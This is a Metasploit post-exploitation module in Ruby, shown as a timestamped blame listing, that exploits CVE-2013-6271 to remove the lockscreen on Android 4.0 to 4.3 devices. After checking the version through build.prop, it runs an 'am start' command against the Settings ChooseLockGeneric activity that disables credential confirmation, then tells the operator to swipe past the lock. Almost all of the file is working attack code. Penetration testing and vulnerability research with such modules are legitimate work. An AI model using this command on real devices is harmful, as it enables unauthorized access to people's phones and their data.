2015-05-26 05:47:44 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
2015-09-04 20:05:45 +00:00
|
|
|
require 'msf/core/post/android'
|
2015-05-26 05:47:44 +00:00
|
|
|
|
|
|
|
class Metasploit4 < Msf::Post
|
|
|
|
Rank = NormalRanking
|
|
|
|
|
|
|
|
include Msf::Post::Common
|
2015-09-04 20:05:45 +00:00
|
|
|
include Msf::Post::Android::System
|
2015-05-26 05:47:44 +00:00
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info, {
|
2015-09-03 17:53:25 +00:00
|
|
|
'Name' => "Android Settings Remove Device Locks (4.0-4.3)",
|
2015-05-26 05:47:44 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.
|
|
|
|
Any unprivileged app can exploit this vulnerability to remove the lockscreen.
|
|
|
|
A logic flaw / design error exists in the settings application that allows an Intent from any
|
|
|
|
application to clear the screen lock. The user may see that the Settings application has crashed,
|
|
|
|
and the phone can then be unlocked by a swipe.
|
|
|
|
This vulnerability was patched in Android 4.4.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [
|
|
|
|
'CureSec', # discovery
|
|
|
|
'timwr' # metasploit module
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2013-6271' ],
|
|
|
|
[ 'URL', 'http://blog.curesec.com/article/blog/26.html' ],
|
|
|
|
[ 'URL', 'http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf' ]
|
|
|
|
],
|
|
|
|
'SessionTypes' => [ 'meterpreter', 'shell' ],
|
|
|
|
'Platform' => 'android',
|
|
|
|
'DisclosureDate' => "Oct 11 2013"
|
|
|
|
}
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
2015-09-04 20:05:45 +00:00
|
|
|
def is_version_compat?
|
|
|
|
build_prop = get_build_prop
|
2015-08-23 07:20:51 +00:00
|
|
|
|
2015-09-04 20:05:45 +00:00
|
|
|
# Sometimes cmd_exec fails to cat build_prop, so the #get_build_prop method returns
|
|
|
|
# empty.
|
|
|
|
if build_prop.empty?
|
|
|
|
raise RuntimeError, "Failed to retrieve build.prop, you might need to try again."
|
|
|
|
end
|
|
|
|
|
|
|
|
android_version = Gem::Version.new(build_prop['ro.build.version.release'])
|
|
|
|
if android_version <= Gem::Version.new('4.3') && android_version >= Gem::Version.new('4.0')
|
|
|
|
return true
|
2015-08-23 07:20:51 +00:00
|
|
|
end
|
|
|
|
|
2015-09-04 20:05:45 +00:00
|
|
|
false
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
unless is_version_compat?
|
2015-05-26 05:47:44 +00:00
|
|
|
print_error("This module is only compatible with Android versions 4.0 to 4.3")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2015-06-02 04:51:17 +00:00
|
|
|
output = cmd_exec('am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task')
|
|
|
|
if output =~ /Error:/
|
2015-08-23 07:20:51 +00:00
|
|
|
print_error("The Intent could not be started")
|
|
|
|
vprint_status("Command output: #{output}")
|
2015-06-02 04:51:17 +00:00
|
|
|
else
|
2015-08-23 07:20:51 +00:00
|
|
|
print_good("Intent started, the lock screen should now be a dud.")
|
|
|
|
print_good("Go ahead and manually swipe or provide any pin/password/pattern to continue.")
|
2015-06-02 04:51:17 +00:00
|
|
|
end
|
2015-05-26 05:47:44 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|